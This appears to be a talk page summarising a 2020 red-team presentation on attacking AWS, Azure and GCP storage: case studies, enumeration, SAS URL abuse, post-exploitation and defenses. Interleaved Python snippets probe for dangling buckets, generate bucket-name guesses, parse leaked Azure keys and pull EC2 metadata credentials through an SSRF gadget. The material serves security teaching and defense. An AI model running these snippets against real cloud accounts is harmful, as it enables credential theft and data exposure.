Attacking Storage Services : The Lynchpin of Cloud Services

HITB Cyber Week Dubai: Red Team Village

18 November 2020

As part of HITB Cyber Week Dubai, I presented a talk at the Red Team Village.

Slides

Video

AI Generated Summary

AI Generated Content Disclaimer

Note: This summary is AI-generated and may contain inaccuracies, errors, or omissions. If you spot any issues, please contact the site owner for corrections. Errors or omissions are unintended.

This presentation at HITB CyberWeek 2020 Red Team Village examines how cloud storage services serve as the lynchpin of cloud infrastructure and why they represent a critical attack surface. Anant Shrivastava, then Technical Director at NotSoSecure Global Services, walks through real-world case studies spanning AWS, Azure, and GCP, presents a structured attack methodology from enumeration through post-exploitation, and provides defenses that both cloud vendors and tenants should implement. The central argument: cloud storage is "the lynchpin of cloud services", a critical component that, when compromised, enables massive organizational damage because virtually every other cloud service depends on it.

Summary

The talk opens by establishing cloud storage’s central role in modern infrastructure. Beyond the obvious file and document storage, cloud storage services (AWS S3, Azure Storage, GCP Storage, Digital Ocean Spaces, SharePoint, OneDrive, Dropbox, Google Drive, and code repositories like GitHub and Bitbucket) underpin virtually all cloud operations. Anant compares cloud storage to an external disk connected to a laptop: that is fundamentally how it operates. PaaS and FaaS environments do not even maintain source code on specific systems; the code is stored in storage containers and retrieved when spinning up new instances. This decoupled architecture means that higher-level access to cloud storage can cascade into massive organizational damage.

The case studies are drawn from real-world incidents and the speaker’s own engagements. An early study found that 10% of all surveyed S3 buckets were publicly accessible and, of those, 20% were world-writable, affecting organizations from Booz Allen Hamilton to WWE to Dow Jones. The HackerOne case study (2016) demonstrates how a security company’s own S3 bucket was writable by any authenticated AWS user, enabling social-engineering attacks through planted documents. The Rocket.Chat incident shows supply-chain risk: the installer referenced an unclaimed S3 bucket that an ethical hacker claimed, gaining the ability to serve malicious content to anyone running the installer (which typically runs with sudo privileges). Most dramatically, the Linux Vendor Firmware Service (LVFS) case combined an unclaimed S3 bucket with a PGP signature-bypass vulnerability, resulting in 2.5 million update requests from 500,000 unique IP addresses over 26 days, illustrating dangling-resource risk at massive scale.
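The dangling-bucket checks behind the Rocket.Chat and LVFS incidents can be sketched in a few lines. S3 answers an anonymous request for a nonexistent bucket with HTTP 404 (NoSuchBucket), while an existing private bucket returns 403; a 404 for a name that an installer still references means anyone can register it. This is a minimal illustrative sketch, not any specific tool:

```python
from urllib.request import Request, urlopen
from urllib.error import HTTPError

def classify_bucket(status):
    """Map the anonymous HTTP status for an S3 bucket URL to its state.

    404 (NoSuchBucket) -> the name is unclaimed and registrable by anyone;
    403 -> the bucket exists but denies anonymous access;
    200 -> the bucket exists and allows anonymous listing.
    """
    return {404: "unclaimed", 403: "exists-private",
            200: "exists-public"}.get(status, "unknown")

def check_dangling(bucket):
    """Probe a bucket name referenced by an installer or script (network call)."""
    req = Request("https://%s.s3.amazonaws.com" % bucket, method="HEAD")
    try:
        status = urlopen(req, timeout=5).status
    except HTTPError as e:
        status = e.code
    return classify_bucket(status)
```

A result of `unclaimed` for a bucket that shipped software still downloads from is exactly the supply-chain condition the talk describes.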

Enumeration techniques exploit a fundamental property: storage names are globally unique per provider. Bucket names are predictably derived from company names plus common suffixes (e.g., “example-assets”, “example-secrets”), making brute-force enumeration viable. Tools like Cloud Enum take a keyword, build mutation lists, and check across AWS, Azure, and GCP simultaneously. AWS S3 error messages helpfully reveal the correct region when querying the wrong one. Additional enumeration paths include Cloud Scraper (extracting cloud URLs from website HTML), GrayHat Warfare (a search engine for public S3 buckets), and Google dorking for s3.amazonaws.com or core.windows.net URLs.
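The mutation step can be sketched as follows. The suffix list is illustrative (not Cloud Enum's actual wordlist), and because names are globally unique per provider, each candidate name maps to exactly one URL per provider that can be probed directly:

```python
# Illustrative suffixes commonly appended to an organization keyword.
SUFFIXES = ["", "-assets", "-backup", "-data", "-dev", "-prod", "-secrets"]

def mutations(keyword):
    """Derive candidate storage names from an organization keyword."""
    return [keyword + s for s in SUFFIXES]

def candidate_urls(name):
    """One probe-able URL per provider for a candidate name.

    Azure storage account names disallow hyphens, so they are stripped
    for the Azure candidate.
    """
    return {
        "aws": "https://%s.s3.amazonaws.com" % name,
        "azure": "https://%s.blob.core.windows.net" % name.replace("-", ""),
        "gcp": "https://storage.googleapis.com/%s" % name,
    }
```

Feeding each URL to an anonymous HEAD request and sorting by status code (404 vs. 403 vs. 200) reproduces the core of the multi-cloud enumeration loop.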

Azure SAS (Shared Access Signature) URLs receive detailed treatment. Contrary to common assumption, SAS URLs can provide container-level or storage-account-level access, not access to a single resource: the same signature that points to one JPG file can grant access to the entire storage account. The speaker describes discovering a SAS URL, loading it into Azure Storage Explorer, finding another container with Azure Function source code, planting a backdoor, and waiting for the next function invocation to execute it. Leaked Azure storage keys are searchable on GitHub via the DefaultEndpointsProtocol keyword, with 64,479 hits at the time of the talk.
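Two pieces of this are easy to demonstrate. A leaked connection string found via the DefaultEndpointsProtocol search is just a semicolon-delimited key/value list, and a container-scoped SAS token can be reused against Azure's List Blobs REST endpoint (`?restype=container&comp=list`) to enumerate far more than the one file the leaked URL pointed at. A minimal sketch (account and container names are made up):

```python
def parse_connection_string(cs):
    """Parse an Azure storage connection string, e.g.
    'DefaultEndpointsProtocol=https;AccountName=...;AccountKey=...;...'
    into a dict. split('=', 1) keeps '=' padding in the base64 key intact."""
    return dict(part.split("=", 1) for part in cs.strip().split(";") if part)

def container_list_url(account, container, sas_token):
    """Build a List Blobs URL. With a container- or account-scoped SAS,
    this enumerates every blob in the container, not just the single
    resource the leaked SAS URL originally referenced."""
    return ("https://%s.blob.core.windows.net/%s?restype=container&comp=list&%s"
            % (account, container, sas_token.lstrip("?")))
```

Azure Storage Explorer automates the same reuse interactively, which is how the speaker pivoted from one leaked URL to the Azure Function source code.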

Post-exploitation paths include credential harvesting from office-document metadata using FOCA or ExifTool, backdooring PaaS/FaaS source code stored in buckets, and extracting secrets (passwords, API keys, PEM files) for lateral movement. The SSRF-to-EC2-takeover chain is particularly instructive: an SSRF vulnerability yields metadata-service credentials, those credentials grant access to S3 buckets, one conveniently named bucket holds PEM files containing 200 key pairs mapped to individual servers by name, and the chain ends in IAM admin access. A similar Elastic Beanstalk attack exploited predictable bucket-naming patterns to access and backdoor source code deployed via automated CI/CD pipelines, placing a backdoor on the official website within minutes.
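The first two links of that chain can be sketched as below. The SSRF gadget is hypothetical (a vulnerable endpoint with an assumed `url` parameter that fetches attacker-supplied URLs server-side); the metadata paths are the real EC2 IMDSv1 endpoints, and the credential document's field names (`AccessKeyId`, `SecretAccessKey`, `Token`) are what IMDS actually returns:

```python
import json
from urllib.parse import urlencode
from urllib.request import urlopen

# IMDSv1 endpoint, reachable only from inside the instance; via SSRF the
# *server* fetches it and echoes the body back to the attacker.
IMDS_CREDS = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"

def fetch_via_ssrf(ssrf_endpoint, target_url):
    """Hypothetical SSRF gadget: the vulnerable app fetches an
    attacker-supplied URL server-side and returns the response body."""
    return urlopen(ssrf_endpoint + "?" + urlencode({"url": target_url}),
                   timeout=5).read().decode()

def creds_to_env(creds_json):
    """Convert the IMDS credential document into the environment variables
    the AWS CLI/SDKs read, ready for pivoting into S3 enumeration."""
    c = json.loads(creds_json)
    return {
        "AWS_ACCESS_KEY_ID": c["AccessKeyId"],
        "AWS_SECRET_ACCESS_KEY": c["SecretAccessKey"],
        "AWS_SESSION_TOKEN": c["Token"],
    }
```

In practice the attacker first fetches `IMDS_CREDS` to learn the role name, appends it to fetch the credential document, exports the three variables, and runs `aws s3 ls` with the instance's permissions.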

The AWS Cognito research crowdsourced 2,504 identity pool identifiers, revealing that more than 1 in 5 configurations were insecure, exposing 906 S3 buckets with sensitive data and 1,572 Lambda functions with at least 78 sensitive environment variables.

Defenses emphasize the shared responsibility model. Cloud vendors should provide clear warnings and automation (like AWS Config rules that run every 24 hours or on configuration changes to detect and auto-remediate public buckets). Tenant responsibilities center on strict IAM policies following least privilege, understanding that “authenticated user” access means any authenticated user on the entire platform (not just your organization), periodic scanning with tools like Scout Suite, and, critically, validating that security measures actually work. The talk introduces chaos engineering principles: simulate attacks, observe system responses, and fine-tune wherever the response falls short.
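The “authenticated user” pitfall is concrete in an S3 bucket ACL: grants to the global `AllUsers` or `AuthenticatedUsers` group URIs expose the bucket to everyone or to every AWS account, respectively. A minimal sketch of the check a scanner like Scout Suite or an AWS Config rule performs, operating on the ACL document shape that boto3's `get_bucket_acl` returns:

```python
# Grantee URIs that make an S3 ACL public. 'AuthenticatedUsers' means any
# AWS account on the entire platform, not just accounts in your organization.
PUBLIC_GRANTEES = {
    "http://acs.amazonaws.com/groups/global/AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers",
}

def public_grants(acl):
    """Return (grantee URI, permission) pairs in an S3 ACL document that
    expose the bucket to anonymous or platform-wide access."""
    return [
        (g["Grantee"].get("URI"), g["Permission"])
        for g in acl.get("Grants", [])
        if g["Grantee"].get("Type") == "Group"
        and g["Grantee"].get("URI") in PUBLIC_GRANTEES
    ]
```

Feeding this the output of `boto3.client("s3").get_bucket_acl(Bucket=name)` for every bucket, on a schedule, approximates the periodic-scan-plus-auto-remediate posture the talk recommends; a WRITE permission in the result is the world-writable case from the early case study.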

Actionable Takeaways

  1. Treat cloud storage as a high-value target in every engagement — it connects to nearly every other cloud service and often contains secrets, source code, and sensitive data
  2. Enumerate storage resources aggressively using tools like Cloud Enum, Google dorking, Cloud Scraper, and cloud bucket search engines during reconnaissance
  3. Check for misconfigured permissions including anonymous access, writable public buckets, and overly permissive “authenticated user” settings across AWS S3, Azure Blob, and GCP Storage
  4. Hunt for leaked Azure SAS URLs and storage account keys on GitHub (search DefaultEndpointsProtocol) as common entry points for storage compromise
  5. Chain SSRF vulnerabilities with cloud metadata services to obtain temporary credentials, then pivot to storage enumeration using predictable naming patterns
  6. Leverage post-exploitation paths from storage access: extract credentials from document metadata with ExifTool/FOCA, access PaaS/FaaS source code for RCE, and pivot using discovered secrets and PEM files
  7. Implement periodic cloud security scanning with tools like Scout Suite, enforce least-privilege IAM policies, use vendor-native controls such as AWS Config for auto-remediation, and conduct regular attack simulations to validate incident response